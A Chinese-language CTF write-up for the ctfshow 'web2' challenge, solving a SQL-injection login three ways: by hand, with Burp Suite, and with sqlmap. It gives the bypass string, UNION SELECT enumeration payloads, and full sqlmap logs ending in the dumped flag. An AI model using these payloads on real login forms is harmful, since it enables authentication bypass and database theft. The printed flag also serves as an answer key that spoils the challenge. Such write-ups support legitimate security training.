记一道题的三种注入姿势
ctfshow-web2
提示: 最简单的SQL注入
手工注入
用万能密码1' or 1=1#,登陆成功
判断字段数,select 1,2,3有回显,select 1,2,3,4时无回显,说明字段为3
1' or 1=1 union select 1,2,3 #
爆数据库,当前数据库为web2
1' or 1=1 union select 1,database(),3 #
爆表名,有一个flag表
1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2' #
查flag表里面的字段
1' or 1=1 union select 1, group_concat(column_name),3 from information_schema.columns where table_name='flag'#
查flag字段里面的数据
1' or 1=1 union select 1,flag,3 from flag#
使用burpsuite注入
万能密码登录,登陆成功
username=1' or 1=1 #&password=123456
判断字段数
username=1' or 1=1 union select 1,2,3 #&password=123456
爆库名
username=1' or 1=1 union select 1,database(),3 #&password=123456
爆表名
username=1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#&password=123456
爆字段名
username=1' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#&password=123456
爆值
username=1' or 1=1 union select 1,flag,3 from flag#&password=123456
使用sqlmap注入
sqlmap-post型,用sqlmap一把梭,随便输入账号密码提交,使用bp抓包
把抓取的数据复制到sqlmap目录下search-test.txt内,使用cmd进入sqlmap目录,
1.sqlmap加载我们的post请求rsearch-test.txt,可以看到有一个名为web2的数据库
python2 sqlmap.py -r search-test.txt --dbs
D:\CTF\WEB\sqlmap>python2 sqlmap.py -r search-test.txt --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.1.3.19#dev}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:47:29
[22:47:29] [INFO] parsing HTTP request from 'search-test.txt'
[22:47:29] [INFO] resuming back-end DBMS 'mysql'
[22:47:29] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin&password=123456' UNION ALL SELECT NULL,CONCAT(CONCAT('qvppq','BvZCIvUYHwJiZOHrkjYfxaYXdlTUfAVLqSDhuFzN'),'qpbbq'),NULL-- biRX
Parameter: username (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(CONCAT('qvppq','kaxOiReLBCwlCfkOGznsgTQolxrbWCWvIIqDGLCc'),'qpbbq'),NULL-- yslB&password=123456
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[22:47:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.3.11, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[22:47:54] [INFO] fetching database names
available databases [6]:
[*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] web2
[22:47:54] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\3a1b884c-2be9-4c53-80d3-733dfd1dd0cf.chall.ctf.show'
[*] shutting down at 22:47:54
2 .查表
python2 sqlmap.py -r search-test.txt -D web2 --tables
D:\CTF\WEB\sqlmap>python2 sqlmap.py -r search-test.txt -D web2 --tables
___
__H__
___ ___[)]_____ ___ ___ {1.1.3.19#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:51:30
[22:51:30] [INFO] parsing HTTP request from 'search-test.txt'
[22:51:30] [INFO] resuming back-end DBMS 'mysql'
[22:51:30] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin&password=123456' UNION ALL SELECT NULL,CONCAT(CONCAT('qvppq','BvZCIvUYHwJiZOHrkjYfxaYXdlTUfAVLqSDhuFzN'),'qpbbq'),NULL-- biRX
Parameter: username (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(CONCAT('qvppq','kaxOiReLBCwlCfkOGznsgTQolxrbWCWvIIqDGLCc'),'qpbbq'),NULL-- yslB&password=123456
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[22:51:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.3.11, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[22:51:32] [INFO] fetching tables for database: 'web2'
Database: web2
[2 tables]
+------+
| user |
| flag |
+------+
[22:51:32] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\3a1b884c-2be9-4c53-80d3-733dfd1dd0cf.chall.ctf.show'
[*] shutting down at 22:51:329
3 .查字段
python2 sqlmap.py -r search-test.txt -D web2 -T flag --columns
D:\CTF\WEB\sqlmap>python2 sqlmap.py -r search-test.txt -D web2 -T flag --columns
___
__H__
___ ___["]_____ ___ ___ {1.1.3.19#dev}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:53:26
[22:53:26] [INFO] parsing HTTP request from 'search-test.txt'
[22:53:26] [INFO] resuming back-end DBMS 'mysql'
[22:53:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin&password=123456' UNION ALL SELECT NULL,CONCAT(CONCAT('qvppq','BvZCIvUYHwJiZOHrkjYfxaYXdlTUfAVLqSDhuFzN'),'qpbbq'),NULL-- biRX
Parameter: username (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(CONCAT('qvppq','kaxOiReLBCwlCfkOGznsgTQolxrbWCWvIIqDGLCc'),'qpbbq'),NULL-- yslB&password=123456
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[22:53:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.3.11, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[22:53:28] [INFO] fetching columns for table 'flag' in database 'web2'
Database: web2
Table: flag
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flag | varchar(255) |
+--------+--------------+
[22:53:28] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\3a1b884c-2be9-4c53-80d3-733dfd1dd0cf.chall.ctf.show'
[*] shutting down at 22:53:28
4 .查数据
python2 sqlmap.py -r search-test.txt -D web2 -T flag -C flag --dump
D:\CTF\WEB\sqlmap>python2 sqlmap.py -r search-test.txt -D web2 -T flag -C flag --dump
___
__H__
___ ___[)]_____ ___ ___ {1.1.3.19#dev}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:56:04
[22:56:04] [INFO] parsing HTTP request from 'search-test.txt'
[22:56:04] [INFO] resuming back-end DBMS 'mysql'
[22:56:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin&password=123456' UNION ALL SELECT NULL,CONCAT(CONCAT('qvppq','BvZCIvUYHwJiZOHrkjYfxaYXdlTUfAVLqSDhuFzN'),'qpbbq'),NULL-- biRX
Parameter: username (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(CONCAT('qvppq','kaxOiReLBCwlCfkOGznsgTQolxrbWCWvIIqDGLCc'),'qpbbq'),NULL-- yslB&password=123456
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[22:56:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.3.11, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[22:56:06] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'web2'
[22:56:06] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[22:56:06] [INFO] the SQL query used returns 1 entries
[22:56:06] [INFO] resumed: flag{b6e4fe66-7e15-48ee-b97d-44f24442edf2}
[22:56:06] [INFO] analyzing table dump for possible password hashes
Database: web2
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{b6e4fe66-7e15-48ee-b97d-44f24442edf2} |
+--------------------------------------------+
[22:56:06] [INFO] table 'web2.flag' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\3a1b884c-2be9-4c53-80d3-733dfd1dd0cf.chall.ctf.show\dump\web2\flag.csv'
[22:56:06] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\3a1b884c-2be9-4c53-80d3-733dfd1dd0cf.chall.ctf.show'
[*] shutting down at 22:56:06
参考文章:sqlmap注入基本教程
